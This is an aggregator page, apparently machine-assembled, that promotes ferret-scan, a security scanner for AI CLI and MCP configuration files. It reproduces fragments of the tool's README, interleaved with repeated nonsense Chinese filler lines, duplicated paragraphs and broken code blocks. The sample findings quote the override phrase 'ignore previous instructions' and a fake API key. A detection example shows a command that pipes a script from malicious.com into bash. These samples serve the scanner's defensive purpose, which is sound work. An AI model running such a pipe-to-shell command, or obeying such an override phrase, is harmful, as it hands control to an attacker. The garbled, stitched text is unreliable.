AI Skill Hub 推荐使用:ferret-scan AI技能包 是一款优质的AI工具。AI 综合评分 7.5 分,在同类工具中表现稳健。如果你正在寻找可靠的AI工具解决方案,这是一个值得深入了解的选择。
安用常用器为常用常用器程序的网络请求器,安用为常用器程序的网络请求器,安用为常用器程序的网络请求器,安用为常用器程序的网络请求器,安用为常用器程序的网络请求器
ferret-scan AI技能包 是一款基于 TypeScript 开发的开源工具,专注于 installable、typescript 等核心功能。作为 GitHub 开源项目,它拥有活跃的社区支持和持续的版本迭代,代码完全透明可审计,支持本地部署以保护数据隐私。无论是个人使用还是集成到企业工作流,都能提供稳定可靠的解决方案。
安用常用器为常用常用器程序的网络请求器,安用为常用器程序的网络请求器,安用为常用器程序的网络请求器,安用为常用器程序的网络请求器,安用为常用器程序的网络请求器
ferret-scan AI技能包 是一款基于 TypeScript 开发的开源工具,专注于 installable、typescript 等核心功能。作为 GitHub 开源项目,它拥有活跃的社区支持和持续的版本迭代,代码完全透明可审计,支持本地部署以保护数据隐私。无论是个人使用还是集成到企业工作流,都能提供稳定可靠的解决方案。
# 方式一:npm 全局安装 npm install -g ferret-scan # 方式二:npx 直接运行(无需安装) npx ferret-scan --help # 方式三:项目依赖安装 npm install ferret-scan # 方式四:从源码运行 git clone https://github.com/fubak/ferret-scan cd ferret-scan npm install npm start
# 命令行使用
ferret-scan --help
# 基本用法
ferret-scan [options] <input>
# Node.js 代码中使用
const ferret_scan = require('ferret-scan');
const result = await ferret_scan.run(options);
console.log(result);
# ferret-scan 配置说明 # 查看配置选项 ferret-scan --config-example > config.yml # 常见配置项 # output_dir: ./output # log_level: info # workers: 4 # 环境变量(覆盖配置文件) export FERRET_SCAN_CONFIG="/path/to/config.yml"
<p align="center"> <pre> ⠀⡠⢂⠔⠚⠟⠓⠒⠒⢂⠐⢄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⣷⣧⣀⠀⢀⣀⣤⣄⠈⢢⢸⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⢀⣿⣭⣿⣿⣿⣿⣽⣹⣧⠈⣾⢱⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⢸⢿⠋⢸⠂⠈⠹⢿⣿⡿⠀⢸⡷⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠈⣆⠉⢇⢁⠶⠈⠀⠉⠀⢀⣾⣇⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⢑⣦⣤⣤⣤⣤⣴⣶⣿⡿⢨⠃⠀⠀⠀███████╗███████╗██████╗ ██████╗ ███████╗████████╗ ⠀⢰⣿⣿⣟⣯⡿⣽⣻⣾⣽⣇⠏⠀⠀⠀⠀██╔════╝██╔════╝██╔══██╗██╔══██╗██╔════╝╚══██╔══╝ ⠀⢿⣿⣟⣾⣽⣻⣽⢷⣻⣾⢿⣄⣀⣀⡀⠀█████╗ █████╗ ██████╔╝██████╔╝█████╗ ██║ ⠀⢸⣿⣟⣷⣯⢿⣽⣻⣟⣾⡟⠁⠀⠀⠀⠀██╔══╝ ██╔══╝ ██╔══██╗██╔══██╗██╔══╝ ██║ ⠀⠈⣿⣿⣷⣻⣯⣟⣷⣯⣿⠀⠀⠀⠀⠀⠀██║ ███████╗██║ ██║██║ ██║███████╗ ██║ ⠀⠀⠘⢿⣿⣷⣯⣿⣞⡷⣿⣇⠀⠀⠀⠀⠀╚═╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝ ╚═╝ ⠀⠀⠀⠈⣿⣿⣿⣷⣟⣿⣳⣿⡆⠀⠀⠀⠀ ⠀⠀⠀⠀⣿⣿⡿⠉⠛⣿⡷⣯⡿⢀⣀⣀⣣⣸⣿⣽⣟⡿⣷⣟⣯⣷⣿⣽⣿⡆⠀⠀⠀ ⠀⠀⠀⢰⣿⣿⠇⠀⠀⣿⣿⣹⠁⠀⠀⢉⣹⣿⣿⣿⣿⠿⣿⣿⣏⣿⣷⣿⣿⣿⣷⣄⠀ ⠀⠀⢾⣿⣿⠟⠀⠀⣰⣿⣷⠏⠀⠀⠺⠿⠿⠿⠛⢉⣠⣴⣿⣿⣿⡻⠏⣋⣿⣿⣿⣷⣇ ⠀⠀⠀⠀⠀⠀⠀⣾⣿⣿⡾⠀⠀⠀⠀⠀⠀⠀⠀⠘⠛⠻⠻⠁⣠⢦⣷⣟⡿⣞⣯⣿⡿ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢻⣿⣟⣿⣿⠿⣿⡿⠟⠁ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠻⠯⠝⠋⠀⠀⠀⠀ </pre> <strong>Static Security Scanner for AI CLI and MCP Configurations</strong> </p>
<p align="center"> <a href="https://www.npmjs.com/package/ferret-scan"><img src="https://img.shields.io/npm/v/ferret-scan?style=flat-square&color=blue" alt="npm version"></a> <a href="https://www.npmjs.com/package/ferret-scan"><img src="https://img.shields.io/npm/dm/ferret-scan?style=flat-square&color=green" alt="npm downloads"></a> <a href="https://github.com/fubak/ferret-scan/blob/main/LICENSE"><img src="https://img.shields.io/npm/l/ferret-scan?style=flat-square" alt="license"></a> <a href="https://github.com/fubak/ferret-scan/actions"><img src="https://img.shields.io/github/actions/workflow/status/fubak/ferret-scan/ci.yml?style=flat-square" alt="build status"></a> <a href="https://github.com/fubak/ferret-scan"><img src="https://img.shields.io/github/stars/fubak/ferret-scan?style=flat-square" alt="GitHub stars"></a> </p>
<p align="center"> <a href="#installation">Installation</a> • <a href="#quick-start">Quick Start</a> • <a href="#supported-ai-clis">Supported CLIs</a> • <a href="#what-it-detects">Detection</a> • <a href="#cicd-integration">CI/CD</a> • <a href="#documentation">Documentation</a> • <a href="#contributing">Contributing</a> </p>
---
Ferret is a static security scanner purpose-built for AI assistant configurations. It detects prompt injections, credential leaks, jailbreak attempts, and malicious patterns in your AI CLI and MCP server configs before they become problems.
Scanning is local and offline by default — no data leaves your machine. Threat intelligence uses a local indicator database (no external feeds unless you opt in).
$ ferret scan .
⡠⢂⠔⠚⠟⠓⠒⠒⢂⠐⢄
⣷⣧⣀⠀⢀⣀⣤⣄⠈⢢⢸⡀ ███████╗███████╗██████╗ ██████╗ ███████╗████████╗
⢀⣿⣭⣿⣿⣿⣿⣽⣹⣧⠈⣾⢱⡀ ██╔════╝██╔════╝██╔══██╗██╔══██╗██╔════╝╚══██╔══╝
⢸⢿⠋⢸⠂⠈⠹⢿⣿⡿⠀⢸⡷⡇ █████╗ █████╗ ██████╔╝██████╔╝█████╗ ██║
⠈⣆⠉⢇⢁⠶⠈⠀⠉⠀⢀⣾⣇⡇ ██╔══╝ ██╔══╝ ██╔══██╗██╔══██╗██╔══╝ ██║
⢑⣦⣤⣤⣤⣤⣴⣶⣿⡿⢨⠃ ██║ ███████╗██║ ██║██║ ██║███████╗ ██║
⢰⣿⣿⣟⣯⡿⣽⣻⣾⣽⣇⠏ ╚═╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝ ╚═╝
Security Scanner for AI CLI Configs
Scanning: /home/user/my-project
Found: 24 configuration files
FINDINGS
CRITICAL CRED-005 Hardcoded API Keys
.claude/settings.json:12
Found: apiKey = "sk-1234..."
Fix: Move to an environment variable or secret manager
HIGH INJ-003 Prompt Injection Pattern
.cursorrules:45
Found: "ignore previous instructions"
Fix: Remove or sanitize instruction override
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
SUMMARY
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Critical: 1 | High: 1 | Medium: 0 | Low: 0
Files scanned: 24 | Time: 89ms | Risk Score: 72/100
This is a security hardening release:
require('re2') always failed under the package's native ESM). It loads now, so the documented ReDoS defense is real instead of falling back to a weaker heuristic. The fallback screener was hardened too.--allow-remote-rules) — URLs that resolve to loopback/private/link-local/cloud-metadata addresses are blocked, and redirects are re-validated per hop.See the full CHANGELOG for details.
Previous release (v2.6.0) added full Language Server Protocol support (ferret lsp), SBOM + AIBOM generation, lightweight runtime monitoring (ferret monitor), and community rule sharing — fetch and validate rules via the github:owner/repo/path shorthand (ferret rules fetch / ferret rules validate). v2.5.0 added ferret scan --self dogfooding and major test-coverage improvements.
Analysis Engines (all implemented, local/offline) - MITRE ATLAS mapping: Every finding mapped to ATLAS adversary techniques - MCP trust scoring: ferret mcp audit rates .mcp.json servers on transport, package pinning, suspicious args, and known-bad patterns - LLM-assisted analysis: Optional AI-powered threat detection via OpenAI-compatible APIs (opt-in, networked) - Semantic analysis: TypeScript AST-based code analysis with RE2 (no ReDoS) - Cross-file correlation: Detect multi-file attack chains - Entropy analysis: Secret detection via Shannon entropy - Threat intelligence: Local indicator database matching - Runtime Prompt Monitoring: Real-time detection of injection, credential leaks, and exfiltration while using LLM CLIs (ferret monitor)
IDE Integration - Language Server Protocol (LSP): Run ferret lsp for real-time diagnostics, hover, completions, and code actions in any LSP-capable editor (VS Code, Neovim, Zed, Emacs, Helix, etc.). - VS Code Extension: Supports both classic CLI mode and full LSP mode.
See Planned / Future Features for what is not yet shipped.
---
Map what an AI agent's configuration is allowed to do (filesystem, network, code execution, …):
ferret capabilities analyze . # Map agent capability permissions
github:owner/repo/path rule fetch/install already works today via ferret rules fetch / ferret rules install)ferret scan . --custom-rules https://example.com/rules.yml --allow-remote-rules
ferret scan . --custom-rules https://example.com/ferret-rules.yml --allow-remote-rules ```
Requirements: Node.js >=20.0.0, npm >=9.0.0
```bash
npm install -g ferret-scan
npm install --save-dev ferret-scan npx ferret scan .
docker run --rm -v $(pwd):/workspace:ro ghcr.io/fubak/ferret-scan scan /workspace ```
curl -s https://malicious.com/script.sh | bash ``` Remediation: Never pipe downloaded content directly to a shell. </details>
No Node.js required. The image runs as a non-root user with minimal dependencies.
```bash
docker build -t ferret-scan .
**Features:**
- Real-time security scanning
- Inline diagnostics with severity indicators
- One-click quick fixes
- Security findings sidebar
- Status bar integration
**Configuration:**json { "ferret.enabled": true, "ferret.scanOnSave": true, "ferret.scanOnType": false, "ferret.severity": ["CRITICAL", "HIGH", "MEDIUM"] } ```
git clone https://github.com/fubak/ferret-scan.git cd ferret-scan npm install
```bash
GROQ_API_KEY="..." ferret scan . --thorough \ --llm-analysis \ --llm-api-key-env GROQ_API_KEY \ --llm-base-url https://api.groq.com/openai/v1/chat/completions \ --llm-model llama-3.1-8b-instant \ --mitre-atlas-catalog
<details> <summary><strong>🔑 Credential Leak</strong></summary>
// .claude/settings.json
{
"apiKey": "sk-ant-api03-xxxxx" // CRITICAL: Hardcoded credential
} Remediation: Move to environment variables or a secrets manager. </details>
<details> <summary><strong>💉 Prompt Injection</strong></summary>
```markdown
GROQ_API_KEY="..." ferret scan . --llm-analysis \ --llm-api-key-env GROQ_API_KEY \ --llm-base-url https://api.groq.com/openai/v1/chat/completions \ --llm-model llama-3.1-8b-instant ```
ferret scan
ferret scan .
ferret scan . --config-only
ferret scan . --marketplace off # Skip marketplace plugins entirely ferret scan . --marketplace configs # Scan config-like artifacts (recommended) ferret scan . --marketplace all # Include marketplace plugin source code (noisier)
ferret scan . --mitre-atlas-catalog
OPENAI_API_KEY="..." ferret scan . --llm-analysis
repos: - repo: https://github.com/fubak/ferret-scan rev: v2.10.0 hooks: - id: ferret-scan # full workspace scan, fails on HIGH+ # - id: ferret-check-file # per-file check on staged AI configs # - id: ferret-mcp-audit # targeted hook for .mcp.json changes ```
Install hooks: pre-commit install. Run manually: pre-commit run ferret-scan --all-files.
| Variable | Description |
|---|---|
NO_COLOR | Disable all color output ([no-color.org](https://no-color.org)) |
FERRET_EXIT_SUCCESS | Override success exit code (default: 0) |
FERRET_EXIT_FINDINGS | Override findings exit code (default: 1) |
FERRET_EXIT_POLICY | Override policy-violation exit code (default: 2) |
FERRET_EXIT_ERROR | Override scan-error exit code (default: 3) |
FERRET_EXIT_CONFIG | Override config-error exit code (default: 4) |
FERRET_EXIT_TIMEOUT | Override timeout exit code (default: 5) |
All override values must be integers in the range 0–255.
Ferret will auto-load config from (first found walking up from CWD):
.ferretrc.json / .ferretrcferret.config.json.ferret/config.jsonYou can also pass an explicit config path with --config.
LLM-assisted analysis is disabled by default (it is networked and may cost money). Ferret redacts obvious secrets and caches results, but you should still assume file excerpts may leave your machine.
Ferret currently supports OpenAI-compatible chat completion APIs (OpenAI, Groq, local gateways).
```bash OPENAI_API_KEY="..." ferret scan . --llm-analysis OPENAI_API_KEY="..." ferret scan . --llm-analysis --llm-all-files
ferret scan . \ --llm-analysis \ --llm-base-url http://localhost:11434/v1/chat/completions \ --llm-model llama3.1:8b
OPENAI_API_KEY="..." ferret scan . --llm-analysis \ --llm-base-url https://api.openai.com/v1/chat/completions \ --llm-model gpt-4o-mini
What is MITRE ATLAS?
MITRE ATLAS (Adversarial Threat Landscape for Artificial-Intelligence Systems) is a knowledge base of adversary tactics and techniques based on real-world attack observations against AI systems. It's the AI/ML equivalent of MITRE ATT&CK.
How Ferret Uses ATLAS
Every security finding in Ferret is automatically mapped to relevant MITRE ATLAS techniques, providing:
Finding: Credential Exposure in AI Config
├─ Severity: CRITICAL
├─ Category: credentials
└─ ATLAS Techniques:
├─ AML.T0024: Steal ML Artifacts
├─ AML.T0040: ML Supply Chain Compromise
└─ AML.T0000: Reconnaissance
Benefits:
✅ Threat Context: Understand how attackers exploit AI systems, not just what was found ✅ Strategic Defense: Map findings to attack chains and prioritize remediation ✅ Compliance: Demonstrate AI-specific security controls for audits ✅ Visualization: Export to ATLAS Navigator for interactive threat mapping ✅ Team Education: Share ATLAS techniques to build security awareness
Example: ATLAS Navigator Export
```bash
Build from source:
```bash cd extensions/vscode npm install npm run compile
ferret-scan 是一款专为 AI 系统设计的安全扫描工具,旨在识别 AI 工作流中的潜在威胁。通过深度集成安全分析引擎,它能够帮助开发者发现配置文件中的敏感信息泄露、提示词注入(Prompt Injection)以及 MCP 服务器的安全风险,为构建稳健的 AI 应用提供保障。
v2.7.0 版本带来了重大的安全加固更新,正式启用 RE2 引擎以防御 ReDoS 攻击。核心功能包括:通过 MITRE ATLAS 映射攻击技术、针对 MCP 服务器的信任评分机制(MCP trust scoring)、以及支持通过 OpenAI 兼容的 API 进行 LLM-assisted analysis(大模型辅助分析),实现语义化的威胁检测。
在使用过程中,若需从远程 URL 加载自定义规则文件(--custom-rules),必须显式开启 --allow-remote-rules 参数以防止 SSRF 攻击。此外,运行环境需确保具备相应的网络访问权限及 Node.js 运行环境。
本项目基于 Node.js 环境,要求 Node.js 版本需在 20 或以上。推荐使用全局安装方式:`npm install -g ferret-scan`;若仅在当前项目中使用,可采用本地开发依赖安装:`npm install --save-dev ferret-scan`,并配合 `npx` 命令运行。
用户可以通过命令行快速启动扫描。支持扫描当前目录或指定路径,并能自动检测其中的 AI CLI 配置。例如,配合 Groq 等提供 OpenAI 兼容接口的服务,可以使用 --llm-analysis 模式进行深度威胁分析,并结合 --mitre-atlas-catalog 获取专业的威胁情报参考。
工具支持灵活的配置模式。可以通过命令行参数指定扫描范围,例如使用 `ferret scan . --config-only` 来减少大型仓库中的噪音,仅针对高信号的 AI 配置文件进行扫描。同时,支持通过环境变量配置 API Key 等敏感信息。
ferret-scan 具备极强的兼容性,支持所有 OpenAI 兼容的 API 端点。开发者可以轻松接入本地运行的 Ollama 实例(无需 API Key),或通过指定 --llm-base-url 接入 OpenAI、Groq 等云端服务,实现灵活的 AI 驱动安全审计。
项目深度集成了 MITRE ATLAS 知识库,将发现的威胁映射到真实的 AI 攻击技术框架中,为 AI/ML 系统提供类似 MITRE ATT&CK 的威胁情报支持。此外,工具还支持 CI/CD 集成与 IDE 集成,能够无缝嵌入开发者的自动化流水线与日常编码流程中。
常用器为常用器程序的网络请求器,安用为常用器程序的网络请求器,安用为常用器程序的网络请求器
AI Skill Hub 为第三方内容聚合平台,本页面信息基于公开数据整理,不对工具功能和质量作任何法律背书。
建议在沙箱或测试环境中充分验证后,再部署至生产环境,并做好必要的安全评估。
✅ MIT 协议 — 最宽松的开源协议之一,可自由商用、修改、分发,仅需保留版权声明。
总体来看,ferret-scan AI技能包 是一款质量良好的AI工具,在同类工具中具备一定竞争力。AI Skill Hub 将持续追踪其更新动态,建议收藏备用,结合自身场景选择合适时机引入使用。
| 原始名称 | ferret-scan |
| 原始描述 | 开源AI工具:Security scanner for LLM CLI (Claude Code, Codex, Gemini, Droid, Opencode, etc) 。⭐74 · TypeScript |
| Topics | installabletypescript |
| GitHub | https://github.com/fubak/ferret-scan |
| License | MIT |
| 语言 | TypeScript |
收录时间:2026-05-17 · 更新时间:2026-05-19 · License:MIT · AI Skill Hub 不对第三方内容的准确性作法律背书。